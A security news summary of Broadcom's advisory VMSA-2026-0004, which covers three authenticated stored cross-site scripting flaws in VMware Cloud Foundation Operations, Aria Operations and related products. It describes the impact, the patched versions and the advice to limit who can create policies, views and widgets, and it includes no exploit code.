High

Broadcom has disclosed three high-severity stored cross-site scripting (XSS) vulnerabilities, tracked as CVE-2026-41722, CVE-2026-41723, and CVE-2026-41724, affecting VMware Cloud Foundation Operations and several related VMware products. The flaws were addressed in security advisory VMSA-2026-0004, released on June 8, 2026. Each vulnerability carries a CVSS v3 score of high and stems from improper sanitization of user-supplied input, allowing authenticated attackers to inject malicious scripts into the platform. Broadcom has confirmed that no workarounds are available, making the installation of security updates the only effective mitigation.

The vulnerabilities impact VMware Cloud Foundation Operations, VMware Aria Operations, VMware Cloud Foundation, VMware vSphere Foundation, and VMware Telco Cloud Platform. Stored XSS attacks are particularly dangerous because the malicious payload is permanently stored within the application and executed whenever another user accesses the affected component. Unlike reflected XSS attacks, stored XSS can repeatedly target multiple users, increasing the likelihood of successful compromise and expanding the attack surface within enterprise virtualization environments.

According to Broadcom, an attacker with authenticated access and permissions to create policies, views, or text widgets can inject specially crafted JavaScript code into these objects. When another user, including a higher-privileged administrator, loads the affected interface, the malicious script executes in the context of that user's session. This could enable attackers to perform unauthorized administrative actions, manipulate system configurations, access sensitive information, or escalate privileges within the virtual infrastructure management environment. The vulnerabilities were privately reported by Researcher.

Broadcom has released patches for all affected products, including VMware Cloud Foundation Operations 9.1.0.0 and 9.0.2.0 EP2, VMware Aria Operations 8.18.6 and 8.18.7, and corresponding updates for VMware Cloud Foundation and VMware Telco Cloud Platform. Organizations are strongly advised to prioritize patch deployment due to the lack of alternative mitigations. Additionally, administrators should review and restrict permissions related to creating policies, views, and text widgets, limiting these capabilities to trusted users while updates are being applied. Prompt remediation is essential to prevent privilege abuse and reduce the risk of compromise across virtualized infrastructure environments.